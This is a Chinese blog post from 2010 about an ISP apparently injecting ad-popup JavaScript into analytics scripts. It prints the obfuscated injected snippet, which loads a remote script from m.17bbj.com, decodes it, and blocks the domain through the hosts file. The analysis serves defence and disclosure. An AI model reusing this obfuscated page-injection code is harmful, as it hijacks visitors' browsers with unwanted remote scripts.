关于无耻铁通在CNZZ、51la、google的统计代码上挂马的解决方法

发布-小七 | 查看- | 发表时间-2010-1-15

暂无，随机码AD_MIDDLE_01.ASP

铁通用户的心痛莫过于网速相当的慢，广告相当的多了，但是铁通的广告行为确实使用的挂马这一招植入目前几大主流的统计代码中，这一招是很无耻下流的，铁通弹广告现在做的很隐蔽，不像之前的是插入页面，现在是关闭网页弹出，好像通过cookie设置或者某些时段劫持，一定时间内只弹出一次，给用户的感觉弹出的广告是因为刚才访问的原因。强烈谴责铁通这种无耻行径，这不仅侵犯铁通用户的权益，而且对铁通用户的电脑安全也构成威胁，希望有此现象的都到工信部电信申诉投诉。
最近关闭一些网站时，老是弹出一些广告，大多是网游、考考你之类诈骗网站，刚开始以为是关闭的那个网页放的广告，可是最近越来越频繁，而且老是这几个广告，开始怀疑是否自己中招，可是自己一直裸奔上网，[separator]所以系统一直很干净，简单排查以下排除自己中毒，而且使用代理的时候没有弹出现象，上网搜了搜相关广告网站，才发现是垃圾铁通搞的鬼，如果网页中含有它所劫持一些统计网站js，统计代码的前面会被加上加上铁通的广告js调用，那样在关闭的网页的时候就会弹出广告。
在分析缓存里面的cnzz的js代码之后，发现里面有一段被加密的代码，在执行CNZZ的统计之前就已经先执行了它，如下：

var _0x9713=["\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D",
"\x74\x69\x74\x6C\x65",
"\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E",
"\x77\x72\x69\x74\x65"];
document[_0x9713[0x3]](_0x9713[0x0]+encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);

在把它解密后，就会发现其中的猫腻了：

var _0x9713=["<script language='javascript' src='http://m.17bbj.com/mwgndfa.php?src=gg&t=","title","'></script>","write"];

由此可知，铁通通过document.write写网页，把打开广告的代码通过m.17bbj.com/mwgndfa.php返回，而且通过嗅探也可以看到访问过m.17bbj.com这个网址。所以只要m.17bbj.com无法访问就可以阻止广告页弹出，修改system32/drivers/etc/里的hosts文件，即可起到解决该挂马的问题了：
在hosts里面加入如下代码：

127.0.0.1 m.17bbj.com 
127.0.0.1 17bbj.com

当然了铁通要是换一个网站就还得重新找出弹广告的地址。
到目前为止，好像没一家isp是干净的吧，中国上网真悲哀，isp强奸，收费贵，网速低，还有墙过滤。
电信114，联通合并网通后也劫持DNS，移动在合并铁通后更是胡作非为了，XX广告，弹窗，挂马劫持大流量网站，屏蔽很多商业网站等等，这些都已经成为国内电信产业的“增值”突破口了。
ps: 工信部投诉网站：
http://dxss.miit.gov.cn:8080/LeaderMail/LeaderMail.jsp （目前我这里铁通已经把工信部的网站屏蔽掉了，我想投诉都无门了）

ps2: 2010年1月15日更新：
现在m.17bbj.com的ip说明就是铁通搞得，附123cha.com的查询结果

您好，原创文章如转载，请注明：转载自宜昌吧[http://www.ycbar.com/ ]
点击复制本文地址：http://www.ycbar.com/web-china/tietong-guama-guanggao-dianxin.shtml

暂无，随机码AD_MIDDLE_02.ASP

或许你还对下面的文章感兴趣

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

暂无，随机码01AD_B.ASP

地球仪